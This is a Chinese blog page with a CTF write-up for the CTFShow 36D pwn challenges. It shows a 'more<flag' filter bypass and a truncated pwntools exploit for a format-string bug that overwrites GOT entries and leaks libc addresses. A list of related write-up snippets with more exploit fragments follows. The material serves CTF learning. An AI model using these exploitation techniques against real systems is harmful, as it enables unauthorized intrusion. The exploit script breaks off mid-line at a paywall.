CTFSHOW 36D杯CTF(pwn部分wp)

最新推荐文章于 2025-02-08 16:34:15 发布
原创 最新推荐文章于 2025-02-08 16:34:15 发布 · 2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全

本文是作者参加CTFShow比赛PWN题目的解题分享,包括签到题、babyFmtstr、MagicString、MengxinStack和tang五道题目。题目涉及Linux基本操作、格式化字符串漏洞、getshell技巧等,通过泄露canary、覆盖返回地址等方法实现攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

PWN WP

感谢1p0ch师傅

最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。

PWN_签到

签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看

more<flag               这里<可以绕过空格

PWN_babyFmtstr

格式化字符串漏洞,我们可以修改got表,这样就有一个无限格式化字符串漏洞的程序了。

#! /usr/bin/env python

from pwn import *
from LibcSearcher import *

sh=remote('124.156.121.112',28028)
#sh=process('./pwn2')
elf=ELF('./pwn2')
#context.log_level='debug'

puts_got=elf.got['puts']
printf_got=elf.got['printf']

memset_addr=elf.got['memset']
#0x0400AA0
payload1='%64c%11$hn%2656c%12$hnAA'+p64(memset_addr+2)+p64(memset_addr)
#gdb.attach(sh)
sh.sendline(payload1)

payload2='AAAA%9$s'+p64(puts_got)

sh.recvuntil('please input name:\n')
#gdb.attach(sh)
sh.sendline(payload2)
sh.recvuntil('Hello AAAA')
puts_addr=u64(sh.recv(6).ljust(8,'\x00'))
print  ('puts_addr:' +hex(pu
最低0.47元/天 解锁文章

200万优质内容无限畅学
CTFshow-PWN-栈溢出(pwn65 详细版)
Welcome To Myon'Blog !
07-14 1293
摘要:该64位程序存在PIE保护,包含RWX段,通过read读取用户输入作为shellcode执行。程序会对输入字符进行严格检查,仅允许大小写字母、数字及部分符号(ASCII 48-90)。利用alpha3工具将原始shellcode编码为符合要求的ASCII字符,通过rax寄存器执行。最终成功获取flag:ctfshow{944db499-0c4a-4894-a0a5-3f7aeccec7de}。关键点包括字符过滤机制分析和alpha3编码技术的应用。
ctfshow pwn wp
Chandra的学习之路
11-26 1054
mov eax,[esi]:将esi中的值作为地址(080490E8地址单元中的值,eax只能读取4个字节的内容,读取一个字符Ascii码即1个字节),然后将该地址单元的值赋给eax,我们在ida可以查看080490E8地址单元的值(Welc倒序的ascii码)。根据题目要求,直接查看寄存器寻址方式的内容,可以得到edx的值为0x36d,根据之前某题大写提示,改成0x36D,即:ctfshow{0x36D}mov esi,msg:将msg的地址赋给esi,此时esi寄存器中的值为080490E8;
CTFShow-36D 2020 pwn
清霂的博客
04-24 424
目录pwn0PWN_MagicString pwn0 #!/usr/bin/env python2 from pwn import * arch = "amd64" filename = "pwn0" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) pop_rdi_addr=0x00000000004006d3 sys_addr=0x0000000000
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5548
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow-36D-pwn-babyheap
SCP000111的博客
04-11 855
参考博客https://www.xl-bit.cn/index.php/archives/15/ 再找wp的时候找了好久,终于找到该师傅的exp,希望后来人能有wp看。不过可能该师傅的博客解码有点问题,导致他的exp不能直接跑通。这里做了整理。 代码如下: 2022.4.11 证明可以跑通 from pwn import * def new(content): p.sendlineafter('>>','1') p.sendafter('your 36D:',content) def fre
ctfshow-36D-pwn(1024_happy_unlink )
kissyunlei的博客
01-12 372
可以利用unlink把堆得地址挪移到target处,这样利用edit就可以把atoi地址写入进去,然后show得到,最后在修改堆地址就可以把atoi替换成system,传入payload成功getshell。在edit函数上存在溢出。
ctfshow 基础pwn wp
n1ptune__的博客
05-29 831
PWN01 简单栈溢出,ret2text from pwn import * #p = process("./pwn1") p = remote(ip,port) p.recv() payload = 'a'*(0x9+4) + p32(0x0804850F) p.sendline(payload) p.interactive() PWN03 32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参 from pwn import * from LibcSearcher import *
ctfshow reverse36D
m0_58348028的博客
02-20 533
目录 签到 签到 发现这个题只要理解清楚他do-while循环中的东西就好了 推测v8即为flag 经过下面的处理之后才出flag上代码 int main() { char flag[31]; int v4; int v6; // [rsp+4h] [rbp-8Ch] unsigned int v7; // [rsp+8h] [rbp-88h] char v8; int v9[31]; char v10[4]; // [rsp+8Ch] [rbp-4h]
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6749
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
[ctf.show.reverse] 36D 签到
weixin_52640415的博客
04-19 675
36D一共4个逆向,难度差太远。 签到这个最简单。由于删除了符号表,所以上来就得先猜函数。 int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rdx __int64 v4; // rcx int v6; // [rsp+4h] [rbp-8Ch] unsigned int v7; // [rsp+8h] [rbp-88h] int v8; // [rsp+Ch] [rb
CTFSHOW|pwn-数学99-wp
l2645470582_的博客
11-08 1056
1.检查保护机制 2.我们用64位的IDA打开该文件 查找关键字符串看到有“cat flag” 3.我们先预览一遍程序 main函数 我们看到要if语句里面的三个函数条件为真 第一个函数 第二个函数 第三个函数 在第三个函数里面条件为真就可以拿到flag(handler) 4.第一个函数:sub_9C0() 条件: 因为输入变量s是有符号数的int型:0~2147483647 -2147483648~-1 所以8 -(-...
ctfshow pwn1
qq_39980610的博客
08-19 464
pwn1
ctf.show 36D——签到
2401_88087539的博客
02-08 215
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
2023CTFSHOW愚人部分WP
qq_42585535的博客
04-04 900
call_user_func**来RCE。
2021祥云 CTF pwnwp
qq_39948058的博客
08-26 1307
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
CTFSHOW: 36D misc ez-qrcode
qq_47875210的博客
08-14 2218
本题为:CTFSHOW36D misc ez-qrcode和攻防世界的qr-easy解法基本一模一样。
36DCTF——mengxinstack
qq_33458986的博客
05-08 544
记录一下36D的mengxinstack题目 下载题目,checksec下分析,开启了很多保护,有canary,64位,IDA分析,知道这个程序先执行了一次read,再把read进去的东西print出来,再read,两次read都会造成栈溢出 观察到程序在运行时候(上图)的栈中有__libc_start_main+235的地址,这个地址其实是__libc_start_main的返回地址即__li...
ISCTF PWN WP 2022
GeekCmore的博客
11-07 1570
ISCTF PWN 部分题解 WP
PWN-PRACTICE-CTFSHOW-5
P1umH0的博客
01-16 598
PWN-PRACTICE-CTFSHOW-5BJDCTF2020-router36D-签到36D-babyFmtstr36D-MagicString BJDCTF2020-router 36D-签到 栈溢出,用ROPgadget找到一个"sh"字符串,ROP,程序过滤了cat和空格,more<flag绕过即可 # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=
ctfshow36D
最新发布
02-15
关于CTFShow 36D的比赛信息和参与方式,通常这类竞赛会提供详细的官方说明文档或者网页来介绍活动规则、参赛资格以及如何报名等细节。 对于想要参加CTFShow 36D的人士来说,以下是可能适用的方法以获取相关信息...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值